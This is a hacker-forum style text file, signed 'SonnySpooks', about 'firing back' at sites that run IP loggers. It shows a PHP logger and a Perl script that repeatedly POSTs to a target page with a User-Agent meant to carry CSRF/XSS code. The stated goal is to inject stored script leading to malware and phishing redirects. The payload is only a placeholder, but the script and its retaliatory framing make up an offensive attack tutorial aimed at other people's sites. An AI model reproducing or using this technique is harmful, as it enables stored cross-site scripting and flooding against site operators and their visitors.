~————————————————————–~~Crafted User Agent~~Flexibilty in modern Pentesting~

1. ~————————————————————–~
2. ~Crafted User Agent~
3. ~Flexibilty in modern Pentesting~
4. ~Hitting Back With an upper Hand Against Pesky Ip Logging~
5. ~————————————————————–~
6. Basic Code In PHP for ip loggers.
7. ~————————————————————–~
8. $ip = $_SERVER[‘REMOTE_ADDR’];
9. $agent = $_SERVER[‘HTTP_USER_AGENT’];
10. $output = "IP: $ip - Agent: $agent"
11. “;
12. $fopen = fopen(“ip.html”, “a”);
13. fwrite($fopen, $output);
14. fclose($fopen);
15. ?>
16. ~——————————————————————-~
17. In Most of these retarded sites, Mostly Scene kid sites.
18. Run a Ip Logger On The Index page. Honestly its retarded how
19. They do this as some of these “Scene kids” Call For NO LOGS !!!
20. But Log Themselves ?. This is the basics of Crafting a Agent
21. and Effectively Sabotaging What they have came to Create.
22. Its honestly some of the most retarded kids that would do this
23. and some are actually just using it for research on the sites
24. traffic, not just to keep logs. However some do Either way.
25. For the pages that do log, the worse thing to come to them would
26. be the User Agent Strings in their php codes. Why is this a
27. problem ? The php code is Their to display the incoming user agent.
28. So what ? Displaying the user agent isnt that bad right ?
29. Alot of times it isnt. Its usually harmless unless they actually
30. store the logs. This could lead to CSRF/XSS that leads to Malware
31. and Redirects to Phishing etc.
32. ~——————————————————————-~
33. #!usr/bin/perl -w
34. #Basic LWP User Agent Script for a Crafted User Agent.
35. use LWP::UserAgent;
36. use strict;
37. print “Basics of a Crafted User Agent\n”;
38. while(1){
39. my $ua = LWP::UserAgent->new;
40. $ua->agent(“CSRF/XSS Code”);
41. my $req = HTTP::Request->new(POST => “IPLOGGER PAGE GOES HERE”);
42. $req->content_type(‘application/x-www-form-urlencoded’);
43. $req->content(‘query=libwww-perl&mode=dist’);
44. my $res = $ua->request($req);
45. if ($res->is_success) {
46. print “Success !\n”;
47. }
48. else {
49. print “Aw\n”;
50. }
51. }
52. ~——————————————————————-~
53. You can do all kinds of things with this. Infact you can add a whole
54. page within your limits. Hope This shows the basic of Crafted Requests
55. and a better grip on Firing Back.
56. ~——————————————————————-~
57. Knowledge Is Power
58. Hacking isnt Swatting,Doxing or DDOS
59. Its all about Thinking Outside the boxes Limits
60. Best Luck to everyone In the future !
61. – SonnySpooks –
62. ~——————————————————————-~
63. _.-“\
64. _.-” \ Dont mind this…
65. ,-” \
66. ( \ 100 Reasons\
67. \ \ IIS is \
68. \ \ Trash \
69. \ \ _.-;
70. \ \ _.-” :
71. \ \,-” _.-”
72. \( _.-”
73. `–“